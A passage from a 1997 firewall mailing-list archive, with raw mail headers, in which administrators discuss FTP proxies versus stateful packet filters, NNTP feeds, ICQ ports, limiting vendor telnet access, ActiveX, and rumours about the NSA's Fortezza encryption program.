17:17:16 -0700 (PDT) Received: (from uucp@localhost) by zen.quick.com.au (8.8.5/8.7.3) id KAA02087; Sun, 8 Jun 1997 10:17:35 +1000 (EST) Message-Id: <199706080017.KAA02087@zen.quick.com.au> Received: from localhost(127.0.0.1) by zen.quick.com.au via smap (V1.3) id sma002085; Sun Jun 8 10:17:30 1997 To: Ryan Russell/SYBASE cc: "Simon J. Gerraty" , firewalls Subject: Re: Stateful Packet Filters vs. Proxies In-reply-to: Your message of "07 Jun 97 10:51:19 EDT." <199706071744.KAA13723@notesgw2.sybase.com> Date: Sun, 08 Jun 1997 10:17:28 +1000 From: "Simon J. Gerraty" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > A proxy would have the same problem. On the contrary, an ftp proxy would have been able to handle it - because it does not simply shuffle packets - it plays the protocol. I know, because my ftp proxy handles the same situation with no problems. --sjg From owner-firewalls-outgoing Sat Jun 7 17:40:31 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA29553 for firewalls-outgoing; Sat, 7 Jun 1997 17:33:34 -0700 (PDT) Received: from sun.NewExpression.com (newexp.nac.net [207.99.5.12]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA29545 for ; Sat, 7 Jun 1997 17:33:28 -0700 (PDT) Received: from timpc.local.NewExpression.com (sun.NewExpression.com [127.0.0.1]) by sun.NewExpression.com (Post.Office MTA v3.0 release 0122 ID# 0-0U10L2S100) with SMTP id AAA2439; Sat, 7 Jun 1997 20:33:17 -0400 Message-Id: <3.0.2.32.19970607194048.029fd084@localhost> X-Sender: timh@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.2 (32) Date: Sat, 07 Jun 1997 19:40:48 -0400 To: doetzl@coop.crn.org From: "Timothy D.J. Hunt" Subject: Re: NNTP server in DMZ? Cc: firewalls@greatcircle.com In-Reply-To: <3396B74D.333@coop.crn.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Joe: At 07:55 AM 6/5/97 -0500, Joe Doetzl wrote: >I have a customer who wishes to install a NNTP server. It is likely >that they will host internal newsgroups that will need to be protected. >The internal network is in the address range reserved for private >internetworks. They are using SOCKS for access from the internal >network to the Internet. Traffic to the DMZ is limited to ftp, http, >dns, smtp and ntp. > >With that in mind is it possible to put the NNTP server on the inside >and still get a feed from an upstream provider? This solution would >eliminate the need for SOCKSified nntp clients. The problem with the standard news feed is that the standard "IHAVE" protocol is a "push" feed with the sender connecting to your server. For this to work, your news server would need to be in the DMZ. If your customer and ISP are prepared to work with a "pull" feed, then your NNTP server can be on the internal network. (Assuming that internal hosts can get to the Internet.) Take a look at "dnews" which pulls the news feed in for you, by pretending to be a standard NNRP client. Regards ---- Tim Hunt, Chatham, NJ, USA phone: +1-973-635-5339 fax: +1-212-208-4385 e-mail: timh@nac.net From owner-firewalls-outgoing Sat Jun 7 17:55:23 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA00518 for firewalls-outgoing; Sat, 7 Jun 1997 17:42:27 -0700 (PDT) Received: from geocities.com (mail4.geocities.com [204.7.246.134]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA00504 for ; Sat, 7 Jun 1997 17:42:19 -0700 (PDT) Received: from ppp01-braila.iiruc.ro (ppp01-braila.iiruc.ro [193.226.145.211]) by geocities.com (8.7.5/8.7.3) with SMTP id RAA22462 for ; Sat, 7 Jun 1997 17:40:56 -0700 (PDT) Message-ID: <339A8615.6692@geocities.com> Date: Sun, 08 Jun 1997 03:14:45 -0700 From: Gabriel Dura Reply-To: dura@geocities.com X-Mailer: Mozilla 3.01Gold (Win16; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Another ISP Security Connection Question Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi ! A friend of mine asked me to help him with his slow Internet connection. Among other things I made a network check using Trumpet Hop Check. Here are the results for the route to the nearest server: 1. 193.yyy.145.zzz local_Cisco_router.xxxxx.xxx (131 ms) 2. 192.168.145.1 (382 ms) <- problem 3. 193.yyy.145.zzz nearest_server.xxxxx.xxx (385 ms) Trace route finished - Port unreachable There is a direct connection between these to servers. The 192.168.145.1 IP address should not exist. I this point there was a great delay in time of the packets. I call the ISP and asked them some explanations. They mumbled something about some problems with the router. Everything is back to normal now but this IP address still exists there now matter what the destination of the packets is. Can anyone give me a hint? Is anyone using a sniffer? Is this a security problem? Is this a problem for personal privacy? Any help would be greatly apreciated. Thanks in advance, Gabriel From owner-firewalls-outgoing Sat Jun 7 18:10:22 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA00330 for firewalls-outgoing; Sat, 7 Jun 1997 17:41:07 -0700 (PDT) Received: from braila.iiruc.ro (braila.iiruc.ro [193.226.145.209]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id RAA00288 for ; Sat, 7 Jun 1997 17:40:48 -0700 (PDT) Received: from ppp01-braila.iiruc.ro by braila.iiruc.ro id aa10265; 8 Jun 97 3:37 EETDST Message-ID: <339A7FEB.787F@geocities.com> Date: Sun, 08 Jun 1997 02:48:28 -0700 From: Gabriel Dura Reply-To: dura@geocities.com X-Mailer: Mozilla 3.01Gold (Win16; I) MIME-Version: 1.0 To: "Ricardo Alvarado B." CC: firewalls@greatcircle.com Subject: Re: ICQ and udp port 4000 References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As far as I know ICQ product currently uses the mirabilis.com:4000 server. But it also supports external programs like VDOPhone, Intel Internet phone, etc. I guess for each of the external programs it must use specific ports. ICQ works from behind a firewall but all I have seen yet are just beta versions so I don't think it would be a good idea to use it this way. Also I doubt it automaticaly configure the external program to work behind a firewall. This might be another potential security problem. Just as I said earlier I use it at home where I don't really care about security given the fact that I have nothing important stuff on my computer. Hope it helps, Gabriel Ricardo Alvarado B. wrote: > > Would you know if there are any other TCP/IP ports it uses besides 4000? > Would it run on TCP 4000 besudes on UDPs? > > Thanks... > > Ricardo Alvarado B. > DCN Network Provisioning > v273.5767 DID: 528.153.5767 > SkyTel: 528.319.0779 PIN 628.2129 > e.mail: ralvarado@avantel.com.mx > > >-----Original Message----- > >From: Gabriel Dura [SMTP:dura@geocities.com] > >Sent: Friday, June 06, 1997 9:48 PM > >To: Pat Verner > >Cc: firewalls@GreatCircle.COM > >Subject: Re: ICQ and udp port 4000 > > > >Hi! > > > >I use ICQ for some time... It is a chat utility but unlike a normal IRC > >client is design for direct connection between computers. The main idea > >behind this product is to find someone you want very fast... I don't > >think you have any other sources of information about this product > >because it is very new... Also tehnical support is unreliable... Most of > >the ppl I know use it for it's user interface and it's features. > >About security... I think all risks from DCC are the same here... > >I never heared anyone complain about security problems but all the > >people I know are using it at home where security is not very important. > > > >If there is anything I can help I'll be glad to do it > > > >Regards, > >Gabriel > > > > > >Pat Verner wrote: > >> > >> > >> I have just had a request to open port 4000 for outgoing UDP in order to > >> support a product called ICQ. I must confess to being loathe to open > >> unnecessary udp ports, but don't want to let prejudice influence me > >> unduly.. > >> > >> Does anyone know anything about this product, and what the security > >> implications would be in opening the port? Any comments would be > >> appreciated. > >> > >> There is a blurb about ICQ on http://www.mirabilis.com/ > >> > >> Thanks in anticipation .. > >> =Pat > > From owner-firewalls-outgoing Sat Jun 7 18:25:29 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA07486 for firewalls-outgoing; Sat, 7 Jun 1997 18:20:31 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA07475 for ; Sat, 7 Jun 1997 18:20:24 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id SAA13568 for ; Sat, 7 Jun 1997 18:24:17 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA26198; Sat, 7 Jun 97 18:22:07 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id SAA28926 for @sybgate.sybase.com:firewalls@greatcircle.com; Sat, 7 Jun 1997 18:20:58 -0700 (PDT) Message-Id: <199706080120.SAA28926@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 0CBEAA7762F202C9882564B000070E77; Sat, 7 Jun 97 18:20:56 EDT To: "Simon J. Gerraty" Cc: Ryan Russell/SYBASE , "Simon J. Gerraty" , firewalls From: Ryan Russell/SYBASE Date: 7 Jun 97 18:26:27 EDT Subject: Re: Stateful Packet Filters vs. Proxies X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sure, an FTP proxy that can decrypt your encrypted FTP session will work, same as a SPF with the same features will. If a SPF or a proxy can act as one endpoint of an ancrypted connection, it can watch for the port command and deal with it. You seem to be under the impression that SPFs aren't capable of understaning the protocol being routed... if that were the case, the non-encrypted FTP session wouldn't work over the PIX box with NAT emabled, would it? There is no reason that the SPF software can't be designed to act as an encryption endpoint, but apparantly the PIX hasn't for FTP. Ryan ---------- Previous Message ---------- To: Ryan.Russell cc: sjg, firewalls From: sjg @ quick.com.au ("Simon J. Gerraty") @ smtp Date: 06/08/97 10:17:28 AM Subject: Re: Stateful Packet Filters vs. Proxies > A proxy would have the same problem. On the contrary, an ftp proxy would have been able to handle it - because it does not simply shuffle packets - it plays the protocol. I know, because my ftp proxy handles the same situation with no problems. --sjg From owner-firewalls-outgoing Sat Jun 7 21:25:29 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id VAA20383 for firewalls-outgoing; Sat, 7 Jun 1997 21:22:19 -0700 (PDT) Received: from zen.quick.com.au (gate.quick.com.au [203.12.250.130]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id VAA20357 for ; Sat, 7 Jun 1997 21:22:09 -0700 (PDT) Received: (from uucp@localhost) by zen.quick.com.au (8.8.5/8.7.3) id OAA09049; Sun, 8 Jun 1997 14:22:35 +1000 (EST) Message-Id: <199706080422.OAA09049@zen.quick.com.au> Received: from localhost(127.0.0.1) by zen.quick.com.au via smap (V1.3) id sma009045; Sun Jun 8 14:22:21 1997 To: Ryan Russell/SYBASE cc: "Simon J. Gerraty" , firewalls Subject: Re: Stateful Packet Filters vs. Proxies In-reply-to: Your message of "07 Jun 97 18:26:27 EDT." <199706080120.SAA28918@notesgw2.sybase.com> Date: Sun, 08 Jun 1997 14:22:18 +1000 From: "Simon J. Gerraty" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > You seem to be under the impression that SPFs > aren't capable of understaning the protocol > being routed... if that were the case, the non-encrypted No, I'm simply commenting on what exists - not what is theoretically possible. --sjg From owner-firewalls-outgoing Sat Jun 7 21:55:15 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id VAA22283 for firewalls-outgoing; Sat, 7 Jun 1997 21:42:56 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id VAA22264 for ; Sat, 7 Jun 1997 21:42:49 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id VAA21524 for ; Sat, 7 Jun 1997 21:46:45 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA11648; Sat, 7 Jun 97 21:44:34 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id VAA01359 for @sybgate.sybase.com:firewalls@greatcircle.com; Sat, 7 Jun 1997 21:43:26 -0700 (PDT) Message-Id: <199706080443.VAA01359@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id E5D156880315E184882564B0001A62E3; Sat, 7 Jun 97 21:43:23 EDT To: "Simon J. Gerraty" Cc: Ryan Russell/SYBASE , "Simon J. Gerraty" , firewalls From: Ryan Russell/SYBASE Date: 7 Jun 97 21:49:04 EDT Subject: Re: Stateful Packet Filters vs. Proxies X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Somewhere along the line you asked if SPFs could do what you described... Didn't you? I hate it when I forget what I was arguing about.. Ryan ---------- Previous Message ---------- To: Ryan.Russell cc: sjg, firewalls From: sjg @ quick.com.au ("Simon J. Gerraty") @ smtp Date: 06/08/97 02:22:18 PM Subject: Re: Stateful Packet Filters vs. Proxies > You seem to be under the impression that SPFs > aren't capable of understaning the protocol > being routed... if that were the case, the non-encrypted No, I'm simply commenting on what exists - not what is theoretically possible. --sjg From owner-firewalls-outgoing Sun Jun 8 00:25:31 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA02477 for firewalls-outgoing; Sun, 8 Jun 1997 00:24:14 -0700 (PDT) Received: from orca.emirates.com (orca.emirates.com [57.12.18.68]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id AAA02470 for ; Sun, 8 Jun 1997 00:24:07 -0700 (PDT) Received: by orca.emirates.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.995.52) id <01BC73FD.FD8C9420@orca.emirates.com>; Sun, 8 Jun 1997 11:20:37 +0400 Message-ID: From: Hidayatullah Khan To: "Firewalls@GreatCircle.COM" Subject: Restrict Springboarding Date: Sun, 8 Jun 1997 11:30:23 +0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.995.52 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello All, Ours is a large organization with a class B addressing. We have a firewall in place to allow outgoing web and mail services. Often we have vendors coming in to our systems to support thier applications. Our firewall is configured to allow the vendors to telnet to specific hosts. On a couple of occasions I have noticed a vendor's presence on a different host for which he was not intended to. My question is how can we restrict a vendor from "springboarding" (i.e telnetting to other machines on our network) from the actual specific host. Thanks in Adv, Khan Khan@Bigfoot.com From owner-firewalls-outgoing Sun Jun 8 01:55:17 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id BAA09014 for firewalls-outgoing; Sun, 8 Jun 1997 01:40:11 -0700 (PDT) Received: from orca.emirates.com (orca.emirates.com [57.12.18.68]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id BAA09004 for ; Sun, 8 Jun 1997 01:40:01 -0700 (PDT) Received: by orca.emirates.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.995.52) id <01BC7408.9B7A3890@orca.emirates.com>; Sun, 8 Jun 1997 12:36:37 +0400 Message-ID: From: Hidayatullah Khan To: "Firewalls@GreatCircle.COM" Subject: POST Restrict Springboarding Date: Sun, 8 Jun 1997 12:46:05 +0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.995.52 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Hello All, > Ours is a large organization with a class B addressing. We have a firewall >in place to allow outgoing web and mail services. Often we have vendors >coming in to our systems to support thier applications. Our firewall is >configured to allow the vendors to telnet to specific hosts. On a couple of >occasions I have noticed a vendor's presence on a different host for which he >was not intended to. My question is how can we restrict a vendor from >"springboarding" (i.e telnetting to other machines on our network) from the >actual specific host. >Thanks in Adv, >Khan > >Khan@Bigfoot.com From owner-firewalls-outgoing Sun Jun 8 06:40:17 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA21772 for firewalls-outgoing; Sun, 8 Jun 1997 06:27:33 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA21765 for ; Sun, 8 Jun 1997 06:27:28 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id JAA21076; Sun, 8 Jun 1997 09:25:53 -0400 (EDT) From: Adam Shostack Message-Id: <199706081325.JAA21076@homeport.org> Subject: Re: Hosting ActiveX applets In-Reply-To: from Kevin McPeake at "Jun 8, 97 00:54:04 am" To: cowboy@home.byelex.nl (Kevin McPeake) Date: Sun, 8 Jun 1997 09:25:52 -0400 (EDT) Cc: firewalls@GreatCircle.COM X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Kevin McPeake wrote: | I've seen all the arguements for why ActiveX should not be allowed into | our corperate network via the Internet. | | Can someone tell me if there's any good reasons why we should not allow | ActiveX on our Web server to be served to visiting web browsing clients? | If the ActiveX component that we serve to clients, considered a security | risk for our internel network / web server? Well, no one seems to remember, but the *really cool* thing about the web was that anyone could view documents, on any platform. We had independance from proprietary standards. We had documents being created in a modifyable language (unlike, say, postscript). This was the first time in a while that we had that sort of vendor freedom. The real reason to not use ActiveX is because you probably don't need to, and you're segmenting out your marketplace to pay homage to a vendor. Also, there are all sorts of security problems with Microsoft's implementations. Many firewalls filter ActiveX, just like you do(?). So why are you creating web pages that your own company wouldn't allow in? Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-firewalls-outgoing Sun Jun 8 09:10:13 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA00175 for firewalls-outgoing; Sun, 8 Jun 1997 08:57:02 -0700 (PDT) Received: from isf.kiev.ua (sunone.isf.kiev.ua [194.44.162.131]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA29999 for ; Sun, 8 Jun 1997 08:56:24 -0700 (PDT) From: valentin@bios.iuf.net Received: from bios.iuf.net by isf.kiev.ua with SMTP id SAA27692; (8.8.3/2.b1) Sun, 8 Jun 1997 18:44:40 +0300 (EET DST) Received: from bios.iuf.net by bios.iuf.net with SMTP id SAA28424; (8.6.12/vak/1.9) Sun, 8 Jun 1997 18:19:44 +0300 Date: Sun, 8 Jun 1997 18:19:44 +0300 Message-Id: <199706081519.SAA28424@bios.iuf.net> X-Sender: valentin@bios.iuf.net X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: nibble@tin.it, firewalls@GreatCircle.COM Subject: Re: ascend routers... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 23:46 7/06/97 +0200, nibble wrote: >Hi all, >mi name's Nibble, plz someone can tell me where can I find >complete documentation about Ascend routers ? > >TNX in advance... > > >The Nibble > > I'm from Crimea, ex-USSR... ;-)) IMHO, You can ask Yahoo (http:\\www.yahoo.com)! Alex Velichko, Sebastopol From owner-firewalls-outgoing Sun Jun 8 09:33:20 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA02452 for firewalls-outgoing; Sun, 8 Jun 1997 09:21:44 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA02443 for ; Sun, 8 Jun 1997 09:21:38 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id JAA15922 for ; Sun, 8 Jun 1997 09:25:39 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA04914; Sun, 8 Jun 97 09:23:29 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id JAA00162 for @sybgate.sybase.com:Firewalls@GreatCircle.COM; Sun, 8 Jun 1997 09:22:16 -0700 (PDT) Message-Id: <199706081622.JAA00162@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 3BB2B27EA1F54F91882564B0005A48C6; Sun, 8 Jun 97 09:21:59 EDT To: Hidayatullah Khan Cc: "Firewalls@GreatCircle.COM" From: Ryan Russell/SYBASE Date: 8 Jun 97 9:28:13 EDT Subject: Re: Restrict Springboarding X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your two choices are to put the hosts they do get access to into a DMZ, or to increase security on all the other hosts in your network. In your net, option 2 probably isn't practical. Ryan ---------- Previous Message ---------- To: Firewalls cc: From: khanhi @ emirates.com (Hidayatullah Khan) @ smtp Date: 06/08/97 11:30:23 AM Subject: Restrict Springboarding Hello All, Ours is a large organization with a class B addressing. We have a firewall in place to allow outgoing web and mail services. Often we have vendors coming in to our systems to support thier applications. Our firewall is configured to allow the vendors to telnet to specific hosts. On a couple of occasions I have noticed a vendor's presence on a different host for which he was not intended to. My question is how can we restrict a vendor from "springboarding" (i.e telnetting to other machines on our network) from the actual specific host. Thanks in Adv, Khan Khan@Bigfoot.com From owner-firewalls-outgoing Sun Jun 8 10:40:12 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA09729 for firewalls-outgoing; Sun, 8 Jun 1997 10:27:38 -0700 (PDT) Received: from silver.ccscns.com (cns2.bbsr.edu [198.116.91.52]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id KAA09719 for ; Sun, 8 Jun 1997 10:27:31 -0700 (PDT) Received: by silver.ccscns.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC7418.0DD10310@silver.ccscns.com>; Sun, 8 Jun 1997 14:27:11 -0300 Message-ID: From: "Adams, Gavin" To: "'Firewalls@GreatCircle.COM'" Subject: RE: Restrict Springboarding Date: Sun, 8 Jun 1997 14:26:48 -0300 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Khan wrote: Date: Sun, 8 Jun 1997 11:30:23 +0400 From: Hidayatullah Khan Subject: Restrict Springboarding Hello All, Ours is a large organization with a class B addressing. We have a firewall in place to allow outgoing web and mail services. Often we have vendors coming in to our systems to support thier applications. Our firewall is configured to allow the vendors to telnet to specific hosts. On a couple of occasions I have noticed a vendor's presence on a different host for which he was not intended to. My question is how can we restrict a vendor from "springboarding" (i.e telnetting to other machines on our network) from the actual specific host. Thanks in Adv, Khan Bring up the question to your management, the people using this vendor, and the vendor themselves. Allowing people from the outside to telnet in is not a good thing. You may trust the vendor, but what happens if someone hacks the host(s) you allow telnet from? The hacker can now "springboard" to your network. --- Gavin From owner-firewalls-outgoing Sun Jun 8 12:31:16 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA15238 for firewalls-outgoing; Sun, 8 Jun 1997 12:10:57 -0700 (PDT) Received: from relay1.shore.net (relay1.shore.net [192.233.85.129]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA15231 for ; Sun, 8 Jun 1997 12:10:51 -0700 (PDT) Received: from [198.115.179.81] (vin.shore.net [198.115.179.81]) by relay1.shore.net (8.8.3/8.8.3) with ESMTP id PAA08742; Sun, 8 Jun 1997 15:11:01 -0400 (EDT) Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 8 Jun 1997 15:11:43 -0500 To: firewalls@greatcircle.com From: Vin McLellan Subject: Re: Fortezza's Fate?? Cc: pcoppinger@appsware.com, mjr@clark.net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I had earlier written: >> There are a lot of rumors buzzing around DC these days to the >>effect that NSA and the Joint Chiefs have tossed in the towel and will, >>within weeks, approve DoD purchases for non-Fortezza security systems, for >>both strong authentication, and (I presume) more standard PKI. I >>understand they have been briefing US.gov security staff and the >>contractors who have been working on Fortezza apps. Paul Coppinger responded: >I'm, of course, interested in your sources of this information, The NSA has been briefing Fortezza contractors and DoD staff. > however I'm >more interested in learning what kinds of security systems they intent to >use in place of Fortezza. I just can't see protecting classified >information using *only* a software token... Not classified info. As I understand it, Fortezza was originally (1991) designed by the NSA to be a (non-RSA) public-key encryption infrastructure for sensitive but unclassified (SUB) and confidential information. (More recently, there has been discussion of using Fortezza to cipher data labelled as "secret or below" -- which would obviously include the first level of classified data.) For the user end of Fortezza PKI, I presume any wholly- software Fortezza "smartcard" would only be used only to support encryption of sensitive but unclassified material (with an attached X509 certificate denoting the "limited assurance" available from such a software source.) As I hear it, the NSA has also ruefully admitted -- at least internally -- that practical, affordable, "trusted" desktop workstations (a crucial piece of the Fortezza/MISSI architecture) will not be available in the immediate future. For this and other reasons, the rollout of Fortezza in its reference application -- DoD's Defense Messaging System (DMS) -- is admittedly stalled. As a form-factor, the current Fortezza PCMCIA crypto card+reader is also a combination that has reportedly had both cost and reliability issues. (PCMCIA was not designed for the constant in/out use foreseen in Fortezza.) Smartcards, of course, remain an option -- but the memory and processing muscle available in the current Fortezza PC cards are apparently hard to match in a smartcard as yet. (NSA might be able to cram crucial pieces of Fortezza into a smartcard... if other functions can be off-loaded to a software PC client. Even for an interim period, software Fortezza without two-factor token-based authentication will worry me, among many.) Some DoD agencies are reportedly demanding software version of the Fortezza PKI token now, and have threatened to rebell against Fortezza/DMS's isolation from the broader universe of secure messaging. Other federal agencies (EPA and Agriculture, among them) have reportedly already opted out of the Fortezza crypto culture -- just because they loose too much by being cut off from the secure e-mail universe which has emerged with commercial international use of RSA-based PKC. (In many parts of government, acccepting Fortezza now will mean they will have to manage two (currrently) wholly-incompatable PKC message and file systems, at both the administrative and user level, for SUB within the government and for SUB to the outside. Doesn't all this begins to smell like that legendary $700 Air Force hammer?) NSA, of course, had hoped to use the aggregate US govt market to re-channel the then-emerging PKI technology into their carefully-restricted alternatives to RSA public-key crypto: the Digital Signature Standard (modulus 1024,) with the SHA-1 hash and Key Exchange Algorithm (KEA,) a Diffie-Helman PKC variant. In Fortezza crypto, the symmetric key encryption is done with the still (?) classified Skipjack (type II) algorithm, which uses an 80-bit key. The LEAF bureaucracy in Commerce and Treasury (which was to provide automatic key-escrow on Fortezza electronic mail outside the government) has been dismantled over the past two months, and the LEAF fields blanked in the PCMCIA firmware -- but "key-recovery" remains Native (automatic and unavoidable) in the Fortezza design. Paul asked: >Are you suggesting that the Skipjack algorithm is about to be published? :) Well, what I hear is that it will be unclassified any day now (if it has not been done already) and distributed in software format to meet demand from DoD agencies. How close to -- or how far from -- "published" would you think that is? From the moment Fortezza is available in software, isn't it only a matter of time before the code falls into the hands of potential adversaries. That may happen faster that a copy of the code is spun off on the Internet for widespread scrutiny, but I wouldn't bet on it. (Reverse engineering Skipjack and the rest of Fortezza will become The Challenge of the year in amateur cryptoanalysis -- a race among many of the best and the brightest code mavens, CIOs as well as cypherpunks.) Marcus, with his usual elan, noted: >Wow!! I bet that's gonna really do wonders for all your >Security Dynamics stock options, Vin! No options, worst luck! I'm a consultant, not an employee, with independence in lieu of such goodies-) Still, it is obvious that if DoD has acknowledged Fortezza PKI to be stalled -- and, because of that, will allow the purchase of non-Fortezza user-authentication systems -- all the OTP vendors will have a field day addressing the pent-up demand for robust user authentication in DoD, the Services, and the other security-conscious Washington agencies. SDTI will get its share, sure enough. The more interesting question may be: how will NSA react to the growing pressure to abandon the isolation of Fortezza PKI, which can't interop with anything or anyone in the exploding world of e-commerce. With Fortezza DMS frozen, NSA and DoD _could_ have chosen to move back into commercial PKI, but they are apparently unwilling to do so. (Thus, the OTP token opportunity, where PKI smartcards might have been used.) With s/mime mailers now in the two leading web browsers, millions (soldiers and bureaucrats, as well as businessmen and college kids) have ready access to user-friendly and robust encrypted e-mail, with digital signatures and all the gifts of PKI (and cheaply enhanced with a private-key off-loaded to a smartcard when the readers become prevalant.) I, for one, would like to see classified data isolated on classified networks, with firewalls made of brick. But SUB? Sensitive but unclassified traffic? Invoices for the purchase of whatnot, etc.? Where's the logic for dot-Gov as such an isolated enclave? Jealousy and/or common sense could make the Services and others Fortezza-locked crypto markets within dot.Gov.us irritable. Fortezza is, after all, in large part a failed NSA attempt to corner the commercial market with a GAKed crypto messaging system. NSA having bet the farm and lost on that one, Fortezza's Martian isolation from the commercial PKI universe looks increasingly costly and perverse. Suerte, _Vin Vin McLellan + The Privacy Guild + 53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548 -- <@><@> -- From owner-firewalls-outgoing Sun Jun 8 14:25:20 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA22157 for firewalls-outgoing; Sun, 8 Jun 1997 14:17:14 -0700 (PDT) Received: from songbird.com (songbird.com [206.14.4.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id OAA22130 for ; Sun, 8 Jun 1997 14:17:04 -0700 (PDT) Received: (from kent@localhost) by songbird.com (8.8.4/8.7.3) id OAA07126; Sun, 8 Jun 1997 14:14:50 -0700 Message-ID: <19970608141448.55608@bywater.songbird.com> Date: Sun, 8 Jun 1997 14:14:48 -0700 From: Kent Crispin To: firewalls@GreatCircle.COM, mjr@clark.net Subject: Re: Fortezza's Fate?? References: Mime-Version: 1.0 Content-Type: text/plain; 